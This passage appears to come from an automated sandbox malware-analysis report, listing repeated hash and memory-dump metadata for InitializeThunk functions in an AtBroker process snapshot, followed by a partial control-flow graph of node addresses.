                                                                              • Instruction ID: c53e841ab6d342cfed606d908b622c5d223b927faf3d5692f3411c3b57960cd9
                                                                              • Opcode Fuzzy Hash: 9e5441d716ac2859a94f32c0b9331ec4cea67f9ef69ec8a90621562a52cc0b37
                                                                              • Instruction Fuzzy Hash: 6690022128140813F240B158A4147071016CBD1605F55C012B4025665D8716DA6576B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ca6686f2eef2b759f08eabcbc2a981fd83098855e69d37a9b410b7ac3c664e9e
                                                                              • Instruction ID: 3bae03f7cfc13734f36a107951f61ef02131e9334d77e29087f856c7b92c7e51
                                                                              • Opcode Fuzzy Hash: ca6686f2eef2b759f08eabcbc2a981fd83098855e69d37a9b410b7ac3c664e9e
                                                                              • Instruction Fuzzy Hash: E390023164580023B240B158688454650159BE1305B55C012F4425665C8B14DA566361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6e21a72c2332750318ba2ad09d5ce1675beb754d0eb315963099d2fb8d9aa2af
                                                                              • Instruction ID: 986b1f28ff5f2f4fe5a2bd35e63be10bfb1cf851a911cd7d540e2bce489699a8
                                                                              • Opcode Fuzzy Hash: 6e21a72c2332750318ba2ad09d5ce1675beb754d0eb315963099d2fb8d9aa2af
                                                                              • Instruction Fuzzy Hash: 6690023124140413F200B598740864610158BE1305F55D012B9025666EC765D9917131
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: eb2400c11370e1c4bf8f8fd3111df66d7dfb95d4f2820837d3884ef9539385d7
                                                                              • Instruction ID: 833020e36eb5d337db4d0527f08f9c70f15ce342f8c8f2a882c9742c3b14a5c8
                                                                              • Opcode Fuzzy Hash: eb2400c11370e1c4bf8f8fd3111df66d7dfb95d4f2820837d3884ef9539385d7
                                                                              • Instruction Fuzzy Hash: 5A90023124148813F210B158A40474A10158BD1305F59C412B8425769D8795D9917121
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: dd27db4f15a494715a1a45a1ddd1308720ef64bb85beb17600e90512a5989a86
                                                                              • Instruction ID: ed2c0db0edc4e4f0187a079898ce85740c67f6992f9133c19a717208b541ffc6
                                                                              • Opcode Fuzzy Hash: dd27db4f15a494715a1a45a1ddd1308720ef64bb85beb17600e90512a5989a86
                                                                              • Instruction Fuzzy Hash: 0990023124140853F200B1586404B4610158BE1305F55C017B4125765D8715D9517521
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5c978d11b61e9d0012a5ac64883cd013190a74ee6422eba79004ade32ef4d727
                                                                              • Instruction ID: 7df597771b3e7e90034e2e0a7fcfabb1fc5433b0dbe960b33c07a0dfc528a343
                                                                              • Opcode Fuzzy Hash: 5c978d11b61e9d0012a5ac64883cd013190a74ee6422eba79004ade32ef4d727
                                                                              • Instruction Fuzzy Hash: 4B900221282441637645F158640450750169BE1245795C013B5415A61C8626E956E621
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: da413775a1b9b3ebf2a53713f0aff4eef0e6247196c52131b34244a065a005d1
                                                                              • Instruction ID: e63995a9e6fe4a920539abba867a11dbc69e6a8e157eb61b707e78f562b34a71
                                                                              • Opcode Fuzzy Hash: da413775a1b9b3ebf2a53713f0aff4eef0e6247196c52131b34244a065a005d1
                                                                              • Instruction Fuzzy Hash: E290023124140423F211B158650470710198BD1245F95C413B4425669D9756DA52B121
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ed7b9a386135892031414db595bfff1310f5f69726774aab8777418ac2362057
                                                                              • Instruction ID: d4843c53eb1c6b2cf38722b45280606e83fcc99020fcfcfa967d6c1c88b70abc
                                                                              • Opcode Fuzzy Hash: ed7b9a386135892031414db595bfff1310f5f69726774aab8777418ac2362057
                                                                              • Instruction Fuzzy Hash: 4B90022925340013F280B158740860A10158BD2206F95D416B4016669CCA15D9696321
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3ea44f231ea259b8040312107061b1dcffcf56f8c1ad06e2879ccfb67aaebb30
                                                                              • Instruction ID: d365e9ff6bbe6fedf698227b51b3493bfa5857f7d0fbe7533a7c87bd136bb0b2
                                                                              • Opcode Fuzzy Hash: 3ea44f231ea259b8040312107061b1dcffcf56f8c1ad06e2879ccfb67aaebb30
                                                                              • Instruction Fuzzy Hash: 0C90022134140013F240B15874186065015DBE2305F55D012F4415665CDA15D9566222
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6759cff34087cb6c2ae5d213cb02b981e1ab128bdabf0a735ce782f81779824f
                                                                              • Instruction ID: 7668d1e631339950db633c29ee59c9ec425126c266d9ea16d7a531beeefd277d
                                                                              • Opcode Fuzzy Hash: 6759cff34087cb6c2ae5d213cb02b981e1ab128bdabf0a735ce782f81779824f
                                                                              • Instruction Fuzzy Hash: AC90026124180413F240B558680460710158BD1306F55C012B6065666E8B29DD517135
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f293a7a639f2e8589c54eb7718f171384745f011bdab3aa606eafe048b57173f
                                                                              • Instruction ID: 17d912245dc087f67b09373698450170ec11fbd285c060eaeab8a258aeaa2890
                                                                              • Opcode Fuzzy Hash: f293a7a639f2e8589c54eb7718f171384745f011bdab3aa606eafe048b57173f
                                                                              • Instruction Fuzzy Hash: 3290022164140513F201B1586404616101A8BD1245F95C023B5025666ECB25DA92B131
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b88a4f0defd1eddffd29df0428a25a703feaa4c5fc068b7166914de77c0f104a
                                                                              • Instruction ID: c42bddcd04955bdd41d612d59d3e9f350e5eba04d085bf1b5480c7e3d0443f86
                                                                              • Opcode Fuzzy Hash: b88a4f0defd1eddffd29df0428a25a703feaa4c5fc068b7166914de77c0f104a
                                                                              • Instruction Fuzzy Hash: 45900221251C0053F300B5686C14B0710158BD1307F55C116B4155665CCA15D9616521
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: cd499f09b0738d9d526228f218adb55b33ea0cde7c401f5109ebba2758fb8ef0
                                                                              • Instruction ID: 8d1f345008d9dcebf2149b7cf6b97407a5514c711bb5c3debc21fe17d5cd2eee
                                                                              • Opcode Fuzzy Hash: cd499f09b0738d9d526228f218adb55b33ea0cde7c401f5109ebba2758fb8ef0
                                                                              • Instruction Fuzzy Hash: 04900221641400536240B168A8449065015AFE2215755C122B4999661D8659D9656665
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ba4e62b83fd3275461e597ac05c58d35e88ade9ecf3c2a5078c8a5fad05cda48
                                                                              • Instruction ID: 3978a1558975f7a19de94e142a4fb834827f8e954bd2583dc4806e8c39ab159c
                                                                              • Opcode Fuzzy Hash: ba4e62b83fd3275461e597ac05c58d35e88ade9ecf3c2a5078c8a5fad05cda48
                                                                              • Instruction Fuzzy Hash: 9890026138140453F200B1586414B061015CBE2305F55C016F5065665D8719DD527126
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d0e8170ac3ddd46f9ef27f74384f1bc01ec051d5b97b1cb94c13dc0b9acb0fd6
                                                                              • Instruction ID: 46f5a10bdca4db65c5b800c896eccf28162a50308c14b3ae87ee7ca97dac34aa
                                                                              • Opcode Fuzzy Hash: d0e8170ac3ddd46f9ef27f74384f1bc01ec051d5b97b1cb94c13dc0b9acb0fd6
                                                                              • Instruction Fuzzy Hash: 4290022128545113F250B15C64046165015ABE1205F55C022B48156A5D8655D9557221
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e56009e29501b2c8ab14ab1b468e610675a883def2ffef53a01a3090390f4f71
                                                                              • Instruction ID: a84f360552e9934e1dec95868a53fe65a1767c7d239016bef5234601dc2e98c8
                                                                              • Opcode Fuzzy Hash: e56009e29501b2c8ab14ab1b468e610675a883def2ffef53a01a3090390f4f71
                                                                              • Instruction Fuzzy Hash: 0D900225251400132205F558270450710568BD6355355C022F5016661CD721D9616121
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: bfa0b8e3452c74063818a20413f6393061e1a19a37138d627fdb4aa1984e590d
                                                                              • Instruction ID: 93c449ae3a570ec1ed2d57569653eda5513b6bb9c0eddc6b0056a09b05b54562
                                                                              • Opcode Fuzzy Hash: bfa0b8e3452c74063818a20413f6393061e1a19a37138d627fdb4aa1984e590d
                                                                              • Instruction Fuzzy Hash: E9900225261400132245F558260450B14559BD7355395C016F54176A1CC721D9656321
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 2115a261a209fd4d172672451eb60fab4155c145133c687740fcce7cb2858960
                                                                              • Instruction ID: 84e6a632302de30094b9880dd5a403a62732531a04ad803987e6c1c152c39a71
                                                                              • Opcode Fuzzy Hash: 2115a261a209fd4d172672451eb60fab4155c145133c687740fcce7cb2858960
                                                                              • Instruction Fuzzy Hash: 4B90023124140813F280B158640464A10158BD2305F95C016B4026765DCB15DB5977A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: dc1bc740be1387444f447dacab68f2e940ff301ae4ff14026091b53c6ca88dc4
                                                                              • Instruction ID: 4239dc4cfa138a79f8c93984cff58c035ddd8e3a23e1536511e42e8d33487916
                                                                              • Opcode Fuzzy Hash: dc1bc740be1387444f447dacab68f2e940ff301ae4ff14026091b53c6ca88dc4
                                                                              • Instruction Fuzzy Hash: 4390023124544853F240B1586404A4610258BD1309F55C012B40657A5D9725DE55B661
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d1c94b30ee8ef2f316d26edee08c9a54f91bdae7ea25d0117041c95545302d82
                                                                              • Instruction ID: 89bb01c4646ef096676096605869c673233e5619ab44613e6372fc6672d41769
                                                                              • Opcode Fuzzy Hash: d1c94b30ee8ef2f316d26edee08c9a54f91bdae7ea25d0117041c95545302d82
                                                                              • Instruction Fuzzy Hash: BB90023164540813F250B158641474610158BD1305F55C012B4025765D8755DB5576A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3310603233.0000000004C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C90000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004DBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3310603233.0000000004E2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4c90000_AtBroker.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 7012ba66eeed95129fc65ea656c0b984484ae040620d357fc458200644f890a8
                                                                              • Instruction ID: 6ccefbd6d039b3436673ac4ab56272059e90b9a423f9d8779650ce3b89314289
                                                                              • Opcode Fuzzy Hash: 7012ba66eeed95129fc65ea656c0b984484ae040620d357fc458200644f890a8
                                                                              • Instruction Fuzzy Hash: 67900261242400136205B1586414616501A8BE1205B55C022F50156A1DC625D9917125
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 27 2cdadd8-2cdadda 28 2cdaddc-2cdae11 call 2cd1400 call 2cf2610 27->28 29 2cdae4a-2cdb176 27->29 44 2cdae30-2cdae35 28->44 45 2cdae13-2cdae2f call 2cfc0a7 CreateThread 28->45 30 2cdb17d-2cdb184 29->30 33 2cdb1b6-2cdb1c0 30->33 34 2cdb186-2cdb1b4 30->34 36 2cdb1d1-2cdb1d8 33->36 34->30 38 2cdb1da-2cdb201 36->38 39 2cdb203-2cdb20a 36->39 38->36 42 2cdb20c-2cdb23f 39->42 43 2cdb241-2cdb24b 39->43 42->39 46 2cdb25c-2cdb268 43->46 48 2cdb27f 46->48 49 2cdb26a-2cdb27d 46->49 51 2cdb286-2cdb28f 48->51 49->46 53 2cdb2ab-2cdb2bc 51->53 54 2cdb291-2cdb2a9 51->54 55 2cdb2cd-2cdb2d9 53->55 54->51 56 2cdb2ec-2cdb2f6 55->56 57 2cdb2db-2cdb2ea 55->57 59 2cdb2f8-2cdb317 56->59 60 2cdb32a-2cdb32e 56->60 57->55 61 2cdb319-2cdb322 59->61 62 2cdb328 59->62 63 2cdb349-2cdb350 60->63 64 2cdb330-2cdb347 60->64 61->62 62->56 65 2cdb3a2-2cdb3e5 63->65 66 2cdb352-2cdb372 63->66 64->60 67 2cdb3f6-2cdb3ff 65->67 68 2cdb379-2cdb37b 66->68 69 2cdb374-2cdb378 66->69 72 2cdb40f-2cdb413 67->72 73 2cdb401-2cdb40d 67->73 70 2cdb37d-2cdb386 68->70 71 2cdb38c-2cdb3a0 68->71 69->68 70->71 71->63 75 2cdb41f 72->75 76 2cdb415-2cdb41c 72->76 73->67 77 2cdb426-2cdb42f 75->77 76->75 78 2cdb63f-2cdb646 77->78 79 2cdb435-2cdb43f 77->79 81 2cdb64c call 2cfa740 78->81 82 2cdb742-2cdb74c 78->82 80 2cdb450-2cdb459 79->80 83 2cdb45b-2cdb468 80->83 84 2cdb475-2cdb479 80->84 86 2cdb651-2cdb655 81->86 89 2cdb46a-2cdb470 83->89 90 2cdb473 83->90 87 2cdb47b-2cdb4a0 84->87 88 2cdb4a2-2cdb4ac 84->88 91 2cdb678-2cdb682 86->91 92 2cdb657-2cdb676 86->92 87->84 94 2cdb4bd-2cdb4c6 88->94 89->90 90->80 95 2cdb693-2cdb69f 91->95 92->86 96 2cdb4dc-2cdb4df 94->96 97 2cdb4c8-2cdb4da 94->97 98 2cdb6b6-2cdb6bd 95->98 99 2cdb6a1-2cdb6b4 95->99 101 2cdb4e5-2cdb4ec 96->101 97->94 103 2cdb6bf-2cdb6e7 98->103 104 2cdb6e9-2cdb6ed 98->104 99->95 105 2cdb4ee-2cdb521 101->105 106 2cdb523-2cdb532 101->106 103->98 107 2cdb6ef-2cdb714 104->107 108 2cdb716-2cdb71d 104->108 105->101 109 2cdb539-2cdb543 106->109 110 2cdb534 106->110 107->104 108->82 111 2cdb71f-2cdb735 108->111 112 2cdb554-2cdb55d 109->112 110->78 113 2cdb737-2cdb73d 111->113 114 2cdb740 111->114 115 2cdb56d-2cdb574 112->115 116 2cdb55f-2cdb56b 112->116 113->114 114->108 118 2cdb595-2cdb5a9 115->118 119 2cdb576-2cdb593 115->119 116->112 120 2cdb5ba-2cdb5c6 118->120 119->115 121 2cdb5c8-2cdb5d5 120->121 122 2cdb5d7-2cdb5e3 120->122 121->120 124 2cdb5e5-2cdb600 122->124 125 